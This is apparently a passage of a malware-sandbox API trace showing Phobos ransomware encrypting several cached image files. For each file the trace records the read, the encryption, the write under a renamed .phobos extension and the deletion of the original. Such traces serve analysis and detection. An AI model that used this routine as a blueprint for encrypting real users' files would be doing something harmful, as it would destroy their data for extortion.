(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.414] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.414] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.414] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9ab, lpOverlapped=0x0) returned 1 [0186.419] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b0) returned 1 [0186.419] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9b0, lpOverlapped=0x0) returned 1 [0186.420] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0186.420] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.420] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.420] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.420] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.420] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.420] CloseHandle (hObject=0x14c) returned 1 [0186.420] CloseHandle (hObject=0x178) returned 1 [0186.421] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0Djg[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0djg[1].jpg")) returned 1 [0186.422] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.423] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2045) returned 1 [0186.423] CloseHandle (hObject=0x178) returned 1 [0186.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg")) returned 0x2020 [0186.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.423] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.424] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.424] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.424] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.424] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7fd, lpOverlapped=0x0) returned 1 [0186.431] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x800, dwBufLen=0x800 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x800) returned 1 [0186.431] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x800, lpOverlapped=0x0) returned 1 [0186.432] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0186.432] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.432] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.432] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.432] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.432] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.432] CloseHandle (hObject=0x178) returned 1 [0186.432] CloseHandle (hObject=0x14c) returned 1 [0186.433] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0g7a[1].jpg")) returned 1 [0186.434] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.434] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6910) returned 1 [0186.434] CloseHandle (hObject=0x14c) returned 1 [0186.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg")) returned 0x2020 [0186.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.435] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.435] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.435] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.435] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1afe, lpOverlapped=0x0) returned 1 [0186.448] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b00, dwBufLen=0x1b00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1b00) returned 1 [0186.448] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1b00, lpOverlapped=0x0) returned 1 [0186.449] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0186.449] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.449] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.449] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.449] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.449] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.449] CloseHandle (hObject=0x14c) returned 1 [0186.449] CloseHandle (hObject=0x178) returned 1 [0186.449] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0mK1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0mk1[1].jpg")) returned 1 [0186.450] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.451] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8131) returned 1 [0186.451] CloseHandle (hObject=0x178) returned 1 [0186.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg")) returned 0x2020 [0186.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.451] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.452] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.452] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.452] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1fc3, lpOverlapped=0x0) returned 1 [0186.464] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1fd0, dwBufLen=0x1fd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1fd0) returned 1 [0186.464] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1fd0, lpOverlapped=0x0) returned 1 [0186.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0186.465] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.465] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.465] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.465] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.466] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.466] CloseHandle (hObject=0x178) returned 1 [0186.466] CloseHandle (hObject=0x14c) returned 1 [0186.466] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0qlB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0qlb[1].jpg")) returned 1 [0186.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0186.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.468] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2501) returned 1 [0186.468] CloseHandle (hObject=0x14c) returned 1 [0186.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg")) returned 0x2020 [0186.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.472] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.472] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0186.473] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0186.473] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.473] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9c5, lpOverlapped=0x0) returned 1 [0186.478] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9d0, dwBufLen=0x9d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9d0) returned 1 [0186.479] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9d0, lpOverlapped=0x0) returned 1 [0186.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0186.479] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0186.479] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0186.479] CryptDestroyKey (hKey=0xa328a8) returned 1 [0186.479] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0186.480] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.480] CloseHandle (hObject=0x14c) returned 1 [0186.480] CloseHandle (hObject=0x178) returned 1 [0186.480] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE8IlA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe8ila[1].jpg")) returned 1 [0186.481] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, 